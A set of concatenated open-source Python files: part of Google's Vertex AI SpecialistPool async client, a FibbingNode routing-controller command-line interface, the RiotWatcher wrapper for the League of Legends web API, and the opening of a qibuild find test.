gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListSpecialistPoolsAsyncPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
async def delete_specialist_pool(
self,
request: Union[
specialist_pool_service.DeleteSpecialistPoolRequest, dict
] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Deletes a SpecialistPool as well as all Specialists
in the pool.
.. code-block:: python
from google.cloud import aiplatform_v1
def sample_delete_specialist_pool():
# Create a client
client = aiplatform_v1.SpecialistPoolServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.DeleteSpecialistPoolRequest(
name="name_value",
)
# Make the request
operation = client.delete_specialist_pool(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.DeleteSpecialistPoolRequest, dict]):
The request object. Request message for
[SpecialistPoolService.DeleteSpecialistPool][google.cloud.aiplatform.v1.SpecialistPoolService.DeleteSpecialistPool].
name (:class:`str`):
Required. The resource name of the SpecialistPool to
delete. Format:
``projects/{project}/locations/{location}/specialistPools/{specialist_pool}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
The JSON representation for Empty is empty JSON
object {}.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = specialist_pool_service.DeleteSpecialistPoolRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.delete_specialist_pool,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
empty_pb2.Empty,
metadata_type=gca_operation.DeleteOperationMetadata,
)
# Done; return the response.
return response
async def update_specialist_pool(
self,
request: Union[
specialist_pool_service.UpdateSpecialistPoolRequest, dict
] = None,
*,
specialist_pool: gca_specialist_pool.SpecialistPool = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Updates a SpecialistPool.
.. code-block:: python
from google.cloud import aiplatform_v1
def sample_update_specialist_pool():
# Create a client
client = aiplatform_v1.SpecialistPoolServiceClient()
# Initialize request argument(s)
specialist_pool = aiplatform_v1.SpecialistPool()
specialist_pool.name = "name_value"
specialist_pool.display_name = "display_name_value"
request = aiplatform_v1.UpdateSpecialistPoolRequest(
specialist_pool=specialist_pool,
)
# Make the request
operation = client.update_specialist_pool(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.UpdateSpecialistPoolRequest, dict]):
The request object. Request message for
[SpecialistPoolService.UpdateSpecialistPool][google.cloud.aiplatform.v1.SpecialistPoolService.UpdateSpecialistPool].
specialist_pool (:class:`google.cloud.aiplatform_v1.types.SpecialistPool`):
Required. The SpecialistPool which
replaces the resource on the server.
This corresponds to the ``specialist_pool`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (:class:`google.protobuf.field_mask_pb2.FieldMask`):
Required. The update mask applies to
the resource.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1.types.SpecialistPool` SpecialistPool represents customers' own workforce to work on their data
labeling jobs. It includes a group of specialist
managers and workers. Managers are responsible for
managing the workers in this pool as well as
customers' data labeling jobs associated with this
pool. Customers create specialist pool as well as
start data labeling jobs on Cloud, managers and
workers handle the jobs using CrowdCompute console.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([specialist_pool, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = specialist_pool_service.UpdateSpecialistPoolRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if specialist_pool is not None:
request.specialist_pool = specialist_pool
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.update_specialist_pool,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("specialist_pool.name", request.specialist_pool.name),)
),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
gca_specialist_pool.SpecialistPool,
metadata_type=specialist_pool_service.UpdateSpecialistPoolOperationMetadata,
)
# Done; return the response.
return response
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
await self.transport.close()
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-aiplatform",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("SpecialistPoolServiceAsyncClient",)
|
googleapis/python-aiplatform
|
google/cloud/aiplatform_v1/services/specialist_pool_service/async_client.py
|
Python
|
apache-2.0
| 34,518 | 0.001477 |
from ConfigParser import DEFAULTSECT
from cmd import Cmd
import logging
import sys
import subprocess
import argparse
import datetime
from fibbing import FibbingManager
import fibbingnode
from fibbingnode.misc.utils import dump_threads
import signal
log = fibbingnode.log
CFG = fibbingnode.CFG
class FibbingCLI(Cmd):
Cmd.prompt = '> '
def __init__(self, mngr, *args, **kwargs):
self.fibbing = mngr
Cmd.__init__(self, *args, **kwargs)
def do_add_node(self, line=''):
"""Add a new fibbing node"""
self.fibbing.add_node()
def do_show_lsdb(self, line=''):
log.info(self.fibbing.root.lsdb)
def do_draw_network(self, line):
"""Draw the network as pdf in the given file"""
self.fibbing.root.lsdb.graph.draw(line)
def do_print_graph(self, line=''):
log.info('Current network graph: %s',
self.fibbing.root.lsdb.graph.edges(data=True))
def do_print_net(self, line=''):
"""Print information about the fibbing network"""
self.fibbing.print_net()
def do_print_routes(self, line=''):
"""Print information about the fibbing routes"""
self.fibbing.print_routes()
def do_exit(self, line=''):
"""Exit the prompt"""
return True
def do_cfg(self, line=''):
part = line.split(' ')
val = part.pop()
key = part.pop()
sect = part.pop() if part else DEFAULTSECT
CFG.set(sect, key, val)
def do_call(self, line):
"""Execute a command on a node"""
items = line.split(' ')
try:
node = self.fibbing[items[0]]
node.call(*items[1:])
except KeyError:
log.error('Unknown node %s', items[0])
def do_add_route(self, line=''):
"""Setup a fibbing route
add_route network via1 metric1 via2 metric2 ..."""
items = line.split(' ')
if len(items) < 3:
log.error('route only takes at least 3 arguments: '
'network via_address metric')
else:
points = []
i = 2
while i < len(items):
points.append((items[i-1], items[i]))
i += 2
log.critical('Add route request at %s',
datetime.datetime.now().strftime('%H.%M.%S.%f'))
self.fibbing.install_route(items[0], points, True)
def do_rm_route(self, line):
"""Remove a route or parts of a route"""
items = line.split(' ')
if len(items) == 1:
ans = raw_input('Remove the WHOLE fibbing route for %s ? (y/N)'
% line)
if ans == 'y':
self.fibbing.remove_route(line)
else:
self.fibbing.remove_route_part(items[0], *items[1:])
def default(self, line):
"""Pass the command to the shell"""
args = line.split(' ')
if args[0] in self.fibbing.nodes:
self.do_call(' '.join(args))
else:
try:
log.info(subprocess.check_output(line, shell=True))
except Exception as e:
log.info('Command %s failed', line)
log.info(e.message)
def eval(self, line):
"""Interpret the given line ..."""
self.eval(line)
def do_ospfd(self, line):
"""Connect to the ospfd daemon of the given node"""
try:
self.fibbing[line].call('telnet', 'localhost', '2604')
except KeyError:
log.error('Unknown node %s', line)
def do_vtysh(self, line):
"""Execute a vtysh command on a node"""
items = line.split(' ')
try:
node = self.fibbing[items[0]]
result = node.vtysh(*items[1:], configure=False)
log.info(result)
except KeyError:
log.error('Unknown node %s', items[0])
def do_configure(self, line):
"""Execute a vtysh configure command on a node"""
items = line.split(' ')
try:
node = self.fibbing[items[0]]
result = node.vtysh(*items[1:], configure=True)
result = result.strip(' \n\t')
if result:
log.info(result)
except KeyError:
log.error('Unknown node %s', items[0])
def do_traceroute(self, line, max_ttl=10):
"""
Perform a simple traceroute between the source and an IP
:param max_ttl: the maximal ttl to use
"""
items = line.split(' ')
try:
node = self.fibbing[items[0]]
node.call('traceroute', '-q', '1', '-I',
'-m', str(max_ttl), '-w', '.1', items[1])
except KeyError:
log.error('Unknown node %s', items[0])
except ValueError:
log.error('This command takes 2 arguments: '
'source node and destination IP')
def do_dump(self, line=''):
dump_threads()
def handle_args():
parser = argparse.ArgumentParser(description='Starts a fibbing node.')
parser.add_argument('ports', metavar='IF', type=str, nargs='*',
help='A physical interface to use')
parser.add_argument('--debug', action='store_true', default=False,
help='Debug (default: disabled)')
parser.add_argument('--nocli', action='store_true', default=False,
help='Disable the CLI')
parser.add_argument('--cfg', help='Use specified config file',
default=None)
args = parser.parse_args()
instance_count = CFG.getint(DEFAULTSECT, 'controller_instance_number')
# Update default config
if args.cfg:
CFG.read(args.cfg)
fibbingnode.BIN = CFG.get(DEFAULTSECT, 'quagga_path')
# Check if we need to force debug mode
if args.debug:
CFG.set(DEFAULTSECT, 'debug', '1')
if CFG.getboolean(DEFAULTSECT, 'debug'):
log.setLevel(logging.DEBUG)
else:
log.setLevel(logging.INFO)
# Check for any specified physical port to use both in config file
# or in args
ports = set(p for p in CFG.sections()
if not (p == 'fake' or p == 'physical' or p == DEFAULTSECT))
ports.update(args.ports)
if not ports:
log.warning('The fibbing node will not be connected '
'to any physical ports!')
else:
log.info('Using the physical ports: %s', ports)
return ports, instance_count, not args.nocli
def main(_CLI=FibbingCLI):
phys_ports, name, cli = handle_args()
if not cli:
fibbingnode.log_to_file('%s.log' % name)
mngr = FibbingManager(name)
def sig_handler(sig, frame):
mngr.cleanup()
fibbingnode.EXIT.set()
sys.exit()
signal.signal(signal.SIGINT, sig_handler)
signal.signal(signal.SIGTERM, sig_handler)
try:
mngr.start(phys_ports=phys_ports)
if cli:
cli = _CLI(mngr=mngr)
cli.cmdloop()
fibbingnode.EXIT.set()
except Exception as e:
log.exception(e)
fibbingnode.EXIT.set()
finally:
fibbingnode.EXIT.wait()
mngr.cleanup()
if __name__ == '__main__':
main()
|
lferran/FibbingNode
|
fibbingnode/southbound/main.py
|
Python
|
gpl-2.0
| 7,223 | 0 |
from collections import deque
import time
import requests
# Constants
BRAZIL = 'br'
EUROPE_NORDIC_EAST = 'eune'
EUROPE_WEST = 'euw'
KOREA = 'kr'
LATIN_AMERICA_NORTH = 'lan'
LATIN_AMERICA_SOUTH = 'las'
NORTH_AMERICA = 'na'
OCEANIA = 'oce'
RUSSIA = 'ru'
TURKEY = 'tr'
# Platforms
platforms = {
BRAZIL: 'BR1',
EUROPE_NORDIC_EAST: 'EUN1',
EUROPE_WEST: 'EUW1',
KOREA: 'KR',
LATIN_AMERICA_NORTH: 'LA1',
LATIN_AMERICA_SOUTH: 'LA2',
NORTH_AMERICA: 'NA1',
OCEANIA: 'OC1',
RUSSIA: 'RU',
TURKEY: 'TR1'
}
queue_types = [
'CUSTOM', # Custom games
'NORMAL_5x5_BLIND', # Normal 5v5 blind pick
'BOT_5x5', # Historical Summoners Rift coop vs AI games
'BOT_5x5_INTRO', # Summoners Rift Intro bots
'BOT_5x5_BEGINNER', # Summoner's Rift Coop vs AI Beginner Bot games
'BOT_5x5_INTERMEDIATE', # Historical Summoner's Rift Coop vs AI Intermediate Bot games
'NORMAL_3x3', # Normal 3v3 games
'NORMAL_5x5_DRAFT', # Normal 5v5 Draft Pick games
'ODIN_5x5_BLIND', # Dominion 5v5 Blind Pick games
'ODIN_5x5_DRAFT', # Dominion 5v5 Draft Pick games
'BOT_ODIN_5x5', # Dominion Coop vs AI games
'RANKED_SOLO_5x5', # Ranked Solo 5v5 games
'RANKED_PREMADE_3x3', # Ranked Premade 3v3 games
'RANKED_PREMADE_5x5', # Ranked Premade 5v5 games
'RANKED_TEAM_3x3', # Ranked Team 3v3 games
'RANKED_TEAM_5x5', # Ranked Team 5v5 games
'BOT_TT_3x3', # Twisted Treeline Coop vs AI games
'GROUP_FINDER_5x5', # Team Builder games
'ARAM_5x5', # ARAM games
'ONEFORALL_5x5', # One for All games
'FIRSTBLOOD_1x1', # Snowdown Showdown 1v1 games
'FIRSTBLOOD_2x2', # Snowdown Showdown 2v2 games
'SR_6x6', # Hexakill games
'URF_5x5', # Ultra Rapid Fire games
'BOT_URF_5x5', # Ultra Rapid Fire games played against AI games
'NIGHTMARE_BOT_5x5_RANK1', # Doom Bots Rank 1 games
'NIGHTMARE_BOT_5x5_RANK2', # Doom Bots Rank 2 games
'NIGHTMARE_BOT_5x5_RANK5', # Doom Bots Rank 5 games
'ASCENSION_5x5', # Ascension games
'HEXAKILL', # 6v6 games on twisted treeline
'KING_PORO_5x5', # King Poro game games
'COUNTER_PICK', # Nemesis games,
'BILGEWATER_5x5', # Black Market Brawlers games
]
game_maps = [
{'map_id': 1, 'name': "Summoner's Rift", 'notes': "Summer Variant"},
{'map_id': 2, 'name': "Summoner's Rift", 'notes': "Autumn Variant"},
{'map_id': 3, 'name': "The Proving Grounds", 'notes': "Tutorial Map"},
{'map_id': 4, 'name': "Twisted Treeline", 'notes': "Original Version"},
{'map_id': 8, 'name': "The Crystal Scar", 'notes': "Dominion Map"},
{'map_id': 10, 'name': "Twisted Treeline", 'notes': "Current Version"},
{'map_id': 11, 'name': "Summoner's Rift", 'notes': "Current Version"},
{'map_id': 12, 'name': "Howling Abyss", 'notes': "ARAM Map"},
{'map_id': 14, 'name': "Butcher's Bridge", 'notes': "ARAM Map"},
]
game_modes = [
'CLASSIC', # Classic Summoner's Rift and Twisted Treeline games
'ODIN', # Dominion/Crystal Scar games
'ARAM', # ARAM games
'TUTORIAL', # Tutorial games
'ONEFORALL', # One for All games
'ASCENSION', # Ascension games
'FIRSTBLOOD', # Snowdown Showdown games
'KINGPORO', # King Poro games
]
game_types = [
'CUSTOM_GAME', # Custom games
'TUTORIAL_GAME', # Tutorial games
'MATCHED_GAME', # All other games
]
sub_types = [
'NONE', # Custom games
'NORMAL', # Summoner's Rift unranked games
'NORMAL_3x3', # Twisted Treeline unranked games
'ODIN_UNRANKED', # Dominion/Crystal Scar games
'ARAM_UNRANKED_5v5', # ARAM / Howling Abyss games
'BOT', # Summoner's Rift and Crystal Scar games played against AI
'BOT_3x3', # Twisted Treeline games played against AI
'RANKED_SOLO_5x5', # Summoner's Rift ranked solo queue games
'RANKED_TEAM_3x3', # Twisted Treeline ranked team games
'RANKED_TEAM_5x5', # Summoner's Rift ranked team games
'ONEFORALL_5x5', # One for All games
'FIRSTBLOOD_1x1', # Snowdown Showdown 1x1 games
'FIRSTBLOOD_2x2', # Snowdown Showdown 2x2 games
'SR_6x6', # Hexakill games
'CAP_5x5', # Team Builder games
'URF', # Ultra Rapid Fire games
'URF_BOT', # Ultra Rapid Fire games against AI
'NIGHTMARE_BOT', # Nightmare bots
'ASCENSION', # Ascension games
'HEXAKILL', # Twisted Treeline 6x6 Hexakill
'KING_PORO', # King Poro games
'COUNTER_PICK', # Nemesis games
'BILGEWATER', # Black Market Brawlers games
]
player_stat_summary_types = [
'Unranked', # Summoner's Rift unranked games
'Unranked3x3', # Twisted Treeline unranked games
'OdinUnranked', # Dominion/Crystal Scar games
'AramUnranked5x5', # ARAM / Howling Abyss games
'CoopVsAI', # Summoner's Rift and Crystal Scar games played against AI
'CoopVsAI3x3', # Twisted Treeline games played against AI
'RankedSolo5x5', # Summoner's Rift ranked solo queue games
'RankedTeams3x3', # Twisted Treeline ranked team games
'RankedTeams5x5', # Summoner's Rift ranked team games
'OneForAll5x5', # One for All games
'FirstBlood1x1', # Snowdown Showdown 1x1 games
'FirstBlood2x2', # Snowdown Showdown 2x2 games
'SummonersRift6x6', # Hexakill games
'CAP5x5', # Team Builder games
'URF', # Ultra Rapid Fire games
'URFBots', # Ultra Rapid Fire games played against AI
'NightmareBot', # Summoner's Rift games played against Nightmare AI
'Hexakill', # Twisted Treeline 6x6 Hexakill games
'KingPoro', # King Poro games
'CounterPick', # Nemesis games
'Bilgewater', # Black Market Brawlers games
]
solo_queue, ranked_5s, ranked_3s = 'RANKED_SOLO_5x5', 'RANKED_TEAM_5x5', 'RANKED_TEAM_3x3'
api_versions = {
'champion': 1.2,
'current-game': 1.0,
'featured-games': 1.0,
'game': 1.3,
'league': 2.5,
'lol-static-data': 1.2,
'lol-status': 1.0,
'match': 2.2,
'matchhistory': 2.2,
'matchlist': 2.2,
'stats': 1.3,
'summoner': 1.4,
'team': 2.4
}
class LoLException(Exception):
def __init__(self, error, response):
self.error = error
self.response = response
def __str__(self):
return self.error
error_400 = "Bad request"
error_401 = "Unauthorized"
error_404 = "Game data not found"
error_429 = "Too many requests"
error_500 = "Internal server error"
error_503 = "Service unavailable"
def raise_status(response):
if response.status_code == 400:
raise LoLException(error_400, response)
elif response.status_code == 401:
raise LoLException(error_401, response)
elif response.status_code == 404:
raise LoLException(error_404, response)
elif response.status_code == 429:
raise LoLException(error_429, response)
elif response.status_code == 500:
raise LoLException(error_500, response)
elif response.status_code == 503:
raise LoLException(error_503, response)
else:
response.raise_for_status()
class RateLimit:
def __init__(self, allowed_requests, seconds):
self.allowed_requests = allowed_requests
self.seconds = seconds
self.made_requests = deque()
def __reload(self):
t = time.time()
while len(self.made_requests) > 0 and self.made_requests[0] < t:
self.made_requests.popleft()
def add_request(self):
self.made_requests.append(time.time() + self.seconds)
def request_available(self):
self.__reload()
return len(self.made_requests) < self.allowed_requests
class RiotWatcher:
def __init__(self, key, default_region=NORTH_AMERICA, limits=(RateLimit(10, 10), RateLimit(500, 600), )):
self.key = key
self.default_region = default_region
self.limits = limits
def can_make_request(self):
for lim in self.limits:
if not lim.request_available():
return False
return True
def base_request(self, url, region, static=False, **kwargs):
if region is None:
region = self.default_region
args = {'api_key': self.key}
for k in kwargs:
if kwargs[k] is not None:
args[k] = kwargs[k]
r = requests.get(
'https://{proxy}.api.pvp.net/api/lol/{static}{region}/{url}'.format(
proxy='global' if static else region,
static='static-data/' if static else '',
region=region,
url=url
),
params=args
)
if not static:
for lim in self.limits:
lim.add_request()
raise_status(r)
return r.json()
def _observer_mode_request(self, url, proxy=None, **kwargs):
if proxy is None:
proxy = self.default_region
args = {'api_key': self.key}
for k in kwargs:
if kwargs[k] is not None:
args[k] = kwargs[k]
r = requests.get(
'https://{proxy}.api.pvp.net/observer-mode/rest/{url}'.format(
proxy=proxy,
url=url
),
params=args
)
for lim in self.limits:
lim.add_request()
raise_status(r)
return r.json()
@staticmethod
def sanitized_name(name):
return name.replace(' ', '').lower()
# champion-v1.2
def _champion_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/champion/{end_url}'.format(
version=api_versions['champion'],
end_url=end_url
),
region,
**kwargs
)
def get_all_champions(self, region=None, free_to_play=False):
return self._champion_request('', region, freeToPlay=free_to_play)
def get_champion(self, champion_id, region=None):
return self._champion_request('{id}'.format(id=champion_id), region)
# current-game-v1.0
def get_current_game(self, summoner_id, platform_id=None, region=None):
if platform_id is None:
platform_id = platforms[self.default_region]
return self._observer_mode_request(
'consumer/getSpectatorGameInfo/{platform}/{summoner_id}'.format(
platform=platform_id,
summoner_id=summoner_id
),
region
)
# featured-game-v1.0
def get_featured_games(self, proxy=None):
return self._observer_mode_request('featured', proxy)
# game-v1.3
def _game_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/game/{end_url}'.format(
version=api_versions['game'],
end_url=end_url
),
region,
**kwargs
)
def get_recent_games(self, summoner_id, region=None):
return self._game_request('by-summoner/{summoner_id}/recent'.format(summoner_id=summoner_id), region)
# league-v2.5
def _league_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/league/{end_url}'.format(
version=api_versions['league'],
end_url=end_url
),
region,
**kwargs
)
def get_league(self, summoner_ids=None, team_ids=None, region=None):
"""summoner_ids and team_ids arguments must be iterable, only one should be specified, not both"""
if (summoner_ids is None) != (team_ids is None):
if summoner_ids is not None:
return self._league_request(
'by-summoner/{summoner_ids}'.format(summoner_ids=','.join([str(s) for s in summoner_ids])),
region
)
else:
return self._league_request(
'by-team/{team_ids}'.format(team_ids=','.join([str(t) for t in team_ids])),
region
)
def get_league_entry(self, summoner_ids=None, team_ids=None, region=None):
"""summoner_ids and team_ids arguments must be iterable, only one should be specified, not both"""
if (summoner_ids is None) != (team_ids is None):
if summoner_ids is not None:
return self._league_request(
'by-summoner/{summoner_ids}/entry'.format(
summoner_ids=','.join([str(s) for s in summoner_ids])
),
region
)
else:
return self._league_request(
'by-team/{team_ids}/entry'.format(team_ids=','.join([str(t) for t in team_ids])),
region
)
def get_challenger(self, region=None, queue=solo_queue):
return self._league_request('challenger', region, type=queue)
def get_master(self, region=None, queue=solo_queue):
return self._league_request('master', region, type=queue)
# lol-static-data-v1.2
def _static_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/{end_url}'.format(
version=api_versions['lol-static-data'],
end_url=end_url
),
region,
static=True,
**kwargs
)
def static_get_champion_list(self, region=None, locale=None, version=None, data_by_id=None, champ_data=None):
return self._static_request(
'champion',
region,
locale=locale,
version=version,
dataById=data_by_id,
champData=champ_data
)
def static_get_champion(self, champ_id, region=None, locale=None, version=None, champ_data=None):
return self._static_request(
'champion/{id}'.format(id=champ_id),
region,
locale=locale,
version=version,
champData=champ_data
)
def static_get_item_list(self, region=None, locale=None, version=None, item_list_data=None):
return self._static_request('item', region, locale=locale, version=version, itemListData=item_list_data)
def static_get_item(self, item_id, region=None, locale=None, version=None, item_data=None):
return self._static_request(
'item/{id}'.format(id=item_id),
region,
locale=locale,
version=version,
itemData=item_data
)
def static_get_mastery_list(self, region=None, locale=None, version=None, mastery_list_data=None):
return self._static_request(
'mastery',
region,
locale=locale,
version=version,
masteryListData=mastery_list_data
)
def static_get_mastery(self, mastery_id, region=None, locale=None, version=None, mastery_data=None):
return self._static_request(
'mastery/{id}'.format(id=mastery_id),
region,
locale=locale,
version=version,
masteryData=mastery_data
)
def static_get_realm(self, region=None):
return self._static_request('realm', region)
def static_get_rune_list(self, region=None, locale=None, version=None, rune_list_data=None):
return self._static_request('rune', region, locale=locale, version=version, runeListData=rune_list_data)
def static_get_rune(self, rune_id, region=None, locale=None, version=None, rune_data=None):
return self._static_request(
'rune/{id}'.format(id=rune_id),
region,
locale=locale,
version=version,
runeData=rune_data
)
def static_get_summoner_spell_list(self, region=None, locale=None, version=None, data_by_id=None, spell_data=None):
return self._static_request(
'summoner-spell',
region,
locale=locale,
version=version,
dataById=data_by_id,
spellData=spell_data
)
def static_get_summoner_spell(self, spell_id, region=None, locale=None, version=None, spell_data=None):
return self._static_request(
'summoner-spell/{id}'.format(id=spell_id),
region,
locale=locale,
version=version,
spellData=spell_data
)
def static_get_versions(self, region=None):
return self._static_request('versions', region)
# match-v2.2
def _match_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/match/{end_url}'.format(
version=api_versions['match'],
end_url=end_url
),
region,
**kwargs
)
def get_match(self, match_id, region=None, include_timeline=False):
return self._match_request(
'{match_id}'.format(match_id=match_id),
region,
includeTimeline=include_timeline
)
# lol-status-v1.0
@staticmethod
def get_server_status(region=None):
if region is None:
url = 'shards'
else:
url = 'shards/{region}'.format(region=region)
r = requests.get('http://status.leagueoflegends.com/{url}'.format(url=url))
raise_status(r)
return r.json()
# match history-v2.2
def _match_history_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/matchhistory/{end_url}'.format(
version=api_versions['matchhistory'],
end_url=end_url
),
region,
**kwargs
)
def get_match_history(self, summoner_id, region=None, champion_ids=None, ranked_queues=None, begin_index=None,
end_index=None):
return self._match_history_request(
'{summoner_id}'.format(summoner_id=summoner_id),
region,
championIds=champion_ids,
rankedQueues=ranked_queues,
beginIndex=begin_index,
endIndex=end_index
)
# match list-v2.2
def _match_list_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/matchlist/by-summoner/{end_url}'.format(
version=api_versions['matchlist'],
end_url=end_url,
),
region,
**kwargs
)
def get_match_list(self, summoner_id, region=None, champion_ids=None, ranked_queues=None, seasons=None,
begin_time=None, end_time=None, begin_index=None, end_index=None):
return self._match_list_request(
'{summoner_id}'.format(summoner_id=summoner_id),
region,
championsIds=champion_ids,
rankedQueues=ranked_queues,
seasons=seasons,
beginTime=begin_time,
endTime=end_time,
beginIndex=begin_index,
endIndex=end_index
)
# stats-v1.3
def _stats_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/stats/{end_url}'.format(
version=api_versions['stats'],
end_url=end_url
),
region,
**kwargs
)
def get_stat_summary(self, summoner_id, region=None, season=None):
return self._stats_request(
'by-summoner/{summoner_id}/summary'.format(summoner_id=summoner_id),
region,
season='SEASON{}'.format(season) if season is not None else None)
def get_ranked_stats(self, summoner_id, region=None, season=None):
return self._stats_request(
'by-summoner/{summoner_id}/ranked'.format(summoner_id=summoner_id),
region,
season='SEASON{}'.format(season) if season is not None else None
)
# summoner-v1.4
def _summoner_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/summoner/{end_url}'.format(
version=api_versions['summoner'],
end_url=end_url
),
region,
**kwargs
)
def get_mastery_pages(self, summoner_ids, region=None):
return self._summoner_request(
'{summoner_ids}/masteries'.format(summoner_ids=','.join([str(s) for s in summoner_ids])),
region
)
def get_rune_pages(self, summoner_ids, region=None):
return self._summoner_request(
'{summoner_ids}/runes'.format(summoner_ids=','.join([str(s) for s in summoner_ids])),
region
)
def get_summoners(self, names=None, ids=None, region=None):
if (names is None) != (ids is None):
return self._summoner_request(
'by-name/{summoner_names}'.format(
summoner_names=','.join([self.sanitized_name(n) for n in names])) if names is not None
else '{summoner_ids}'.format(summoner_ids=','.join([str(i) for i in ids])),
region
)
else:
return None
def get_summoner(self, name=None, _id=None, region=None):
if (name is None) != (_id is None):
if name is not None:
name = self.sanitized_name(name)
return self.get_summoners(names=[name, ], region=region)[name]
else:
return self.get_summoners(ids=[_id, ], region=region)[str(_id)]
return None
def get_summoner_name(self, summoner_ids, region=None):
return self._summoner_request(
'{summoner_ids}/name'.format(summoner_ids=','.join([str(s) for s in summoner_ids])),
region
)
# team-v2.4
def _team_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/team/{end_url}'.format(
version=api_versions['team'],
end_url=end_url
),
region,
**kwargs
)
def get_teams_for_summoner(self, summoner_id, region=None):
return self.get_teams_for_summoners([summoner_id, ], region=region)[str(summoner_id)]
def get_teams_for_summoners(self, summoner_ids, region=None):
return self._team_request(
'by-summoner/{summoner_id}'.format(summoner_id=','.join([str(s) for s in summoner_ids])),
region
)
def get_team(self, team_id, region=None):
return self.get_teams([team_id, ], region=region)[str(team_id)]
def get_teams(self, team_ids, region=None):
return self._team_request('{team_ids}'.format(team_ids=','.join(str(t) for t in team_ids)), region)
|
gnozell/Yar-Ha-Har
|
lib/riotwatcher/riotwatcher.py
|
Python
|
mit
| 22,700 | 0.00163 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2021 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
""" Test QiBuild Find """
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
import qibuild.config
from qibuild import find
from qibuild.test.conftest import QiBuildAction
from qitoolchain.test.conftest import QiToolchainAction
def test_find_target_in_project_cmake(qibuild_action, record_messages):
""" Test Find Target In Project CMake """
qibuild_action.add_test_project("world")
qibuild_action.add_test_project("hello")
qibuild_action("configure", "hello")
record_messages.reset()
qibuild_action("find", "--cmake", "hello", "world")
assert record_messages.find("WORLD_LIBRARIES")
def test_find_target_in_toolchain_package_cmake(cd_to_tmpdir, record_messages):
""" Test Find Target In Toolchain Package CMake """
qibuild_action = QiBuildAction()
qitoolchain_action = QiToolchainAction()
build_worktree = qibuild_action.build_worktree
qibuild_action.add_test_project("world")
qibuild_action.add_test_project("hello")
world_package = qibuild_action("package", "world")
qitoolchain_action("create", "foo")
